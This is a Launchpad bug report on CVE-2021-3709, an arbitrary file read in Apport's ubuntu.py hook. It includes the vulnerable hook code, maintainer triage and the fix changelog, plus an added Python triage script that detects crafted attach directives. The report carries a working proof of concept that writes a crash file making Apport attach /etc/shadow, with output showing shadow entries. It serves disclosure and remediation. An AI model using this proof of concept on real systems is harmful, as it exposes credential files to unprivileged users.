Arbitrary file read in general hook (ubuntu.py)

Bug #1934308 reported by mal
| Affects | Status | Importance | Assigned to | Milestone |
|---|---|---|---|---|
| Apport | Fix Released | Critical | Unassigned | |
| apport (Ubuntu) | Fix Released | Critical | Unassigned | |

Bug Description

While reviewing Apport's general hooks it was found that the hook `apport/general-hooks/ubuntu.py` includes user-controlled files when handling `emacs`-related reports:

if report['Package'] in ['emacs22', 'emacs23', 'emacs-snapshot', 'xemacs21']:
    # emacs add-on packages trigger byte compilation, which might fail
    # we are very interested in reading the compilation log to determine
    # where to reassign this report to
    regex = r'^!! Byte-compilation for x?emacs\S+ failed!'
    if attachment in report and re.search(regex, log_file, re.MULTILINE):
        for line in log_file.split('\n'):
            m = re.search(r'^!! and attach the file (\S+)', line) # [0]
            if m:
                path = m.group(1)
                apport.hookutils.attach_file_if_exists(report, path) # [1]

After using a regular expression to extract the file to attach [0], the extracted file subsequently gets attached to the report file [1].

With automatic crash reporting enabled the following PoC (tested on 20.04/21.04 Desktop) includes the file `/etc/shadow` in the respective report file:

cat << EOF > /var/crash/poc.crash
ProblemType: Package
ExecutablePath: /poc
Package: emacs22
DpkgTerminalLog: !! Byte-compilation for emacs22 failed!
 !! and attach the file /etc/shadow
EOF

grep -A5 DpkgTerminal /var/crash/poc.crash
DpkgTerminalLog: !! Byte-compilation for emacs22 failed!
 !! and attach the file /etc/shadow
.etc.shadow:
 root:!:18393:0:99999:7:::
 daemon:*:18375:0:99999:7:::
 bin:*:18375:0:99999:7:::

Best regards!
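
A triage check for crash files, as an added example that is not part of the original report or of Apport's code: it parses a report, applies the package list and regular expressions from the hook excerpt above, and returns each path the pre-fix hook would attach together with whether a matching key is already present in the report. The field parser and the `path_key` derivation are assumptions (the latter inferred from the `.etc.shadow:` key in the PoC output); the sample reports are constructed.

```python
import re

# Package names and patterns copied from the hook excerpt in the bug description.
EMACS_PACKAGES = {'emacs22', 'emacs23', 'emacs-snapshot', 'xemacs21'}
FAILED_RE = re.compile(r'^!! Byte-compilation for x?emacs\S+ failed!', re.MULTILINE)
ATTACH_RE = re.compile(r'^!! and attach the file (\S+)', re.MULTILINE)
LOG_FIELDS = ('DpkgTerminalLog',)  # the field used in the PoC

def parse_report(text):
    """Parse 'Key: value' fields; a line starting with a space continues the previous field."""
    fields, key = {}, None
    for line in text.splitlines():
        if line.startswith(' ') and key is not None:
            fields[key] += ('\n' if fields[key] else '') + line[1:]
        else:
            name, sep, value = line.partition(':')
            if sep:
                key = name
                fields[key] = value.strip()
    return fields

def path_key(path):
    """Assumed key derivation, inferred from the '.etc.shadow' key in the PoC output."""
    return re.sub(r'[^0-9A-Za-z_.-]', '.', path)

def find_attach_directives(text):
    """Return (path, already_attached) for each directive the pre-fix hook would act on."""
    fields = parse_report(text)
    if fields.get('Package') not in EMACS_PACKAGES:
        return []
    hits = []
    for name in LOG_FIELDS:
        log = fields.get(name, '')
        if FAILED_RE.search(log):
            hits += [(p, path_key(p) in fields) for p in ATTACH_RE.findall(log)]
    return hits

# Constructed sample reports modelled on the PoC; no real file content is included.
PENDING = ("ProblemType: Package\nPackage: emacs22\n"
           "DpkgTerminalLog: !! Byte-compilation for emacs22 failed!\n"
           " !! and attach the file /etc/shadow\n")
PROCESSED = PENDING + ".etc.shadow:\n (constructed placeholder)\n"
BENIGN = PENDING.replace("Package: emacs22", "Package: bash")

if __name__ == '__main__':
    for label, sample in (('pending', PENDING), ('processed', PROCESSED), ('benign', BENIGN)):
        print(label, find_attach_directives(sample))
```

A `True` in the second position means the report already carries an attachment key for that path, so the report file itself should be treated as containing the referenced file's content.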

Alex Murray (alexmurray) wrote :

I am unable to reproduce this issue on an up to date Ubuntu 20.04 desktop install - when apport sees the crash file it runs but is not able to access /etc/shadow so this does not get attached - am I missing something? Can you please provide instructions for reproducing this on a fresh Ubuntu 20.04 install?

Changed in apport (Ubuntu):
status: New → Incomplete
mal (mallle) wrote :

I just confirmed it on a freshly installed VM (Ubuntu 20.04 Desktop, VMware Workstation 16 Player, Easy Install):
* Update: sudo apt update && sudo apt dist-upgrade
* Enable automatic problem reporting: Settings -> Diagnostics -> Send error reports to Canonical -> Automatic
* Reboot

m@ubuntu:~$ cat << EOF > /var/crash/poc.crash
> ProblemType: Package
> ExecutablePath: /poc
> Package: emacs22
> DpkgTerminalLog: !! Byte-compilation for emacs22 failed!
> !! and attach the file /etc/shadow
> EOF
m@ubuntu:~$ grep -A5 DpkgTerminal /var/crash/poc.crash
DpkgTerminalLog: !! Byte-compilation for emacs22 failed!
 !! and attach the file /etc/shadow
.etc.shadow:
 root:!:18810:0:99999:7:::
 daemon:*:18667:0:99999:7:::
 bin:*:18667:0:99999:7:::

I hope this helps!

mal (mallle) wrote :

To avoid the expiration of this issue, I kindly wanted to ask if you could reproduce the issue?

Marc Deslauriers (mdeslaur) wrote :

I am able to reproduce the issue, thanks!

Changed in apport (Ubuntu):
status: Incomplete → Confirmed
Marc Deslauriers (mdeslaur) wrote :

The approach proposed in comment #6 of bug 1933832 would solve this issue also.

Marc Deslauriers (mdeslaur) wrote :

The emacs packages haven't stored the byte compilation results in log files for years, at least since emacs22, so we can just remove this code completely.

Steve Beattie (sbeattie) wrote :

Please use CVE-2021-3709 for this issue. Thanks.

Marc Deslauriers (mdeslaur) wrote :

I propose we publish these updates on 2021-09-14.

That will allow us to perform the final testing of these updates this week.

Please advise if that public date is problematic.

Thanks!

Launchpad Janitor (janitor) wrote :

This bug was fixed in the package apport - 2.20.11-0ubuntu65.3

---------------
apport (2.20.11-0ubuntu65.3) hirsute-security; urgency=medium

  * SECURITY UPDATE: Arbitrary file read (LP: #1934308)
    - data/general-hooks/ubuntu.py: don't attempt to include emacs
      byte-compilation logs, they haven't been generated by the emacs
      packages in a long time.
    - CVE-2021-3709
  * SECURITY UPDATE: Info disclosure via path traversal (LP: #1933832)
    - apport/hookutils.py, test/test_hookutils.py: detect path traversal
      attacks, and directory symlinks.
    - CVE-2021-3710

 -- Marc Deslauriers <email address hidden> Thu, 26 Aug 2021 10:55:40 -0400

Changed in apport (Ubuntu):
status: Confirmed → Fix Released
Marc Deslauriers (mdeslaur) wrote :

Updates have now been released:

https://ubuntu.com/security/notices/USN-5077-1

Thanks!

information type: Private Security → Public Security
Benjamin Drung (bdrung)
Changed in apport:
status: New → Fix Released
importance: Undecided → Critical
milestone: none → 2.21.0
Benjamin Drung (bdrung)
Changed in apport (Ubuntu):
importance: Undecided → Critical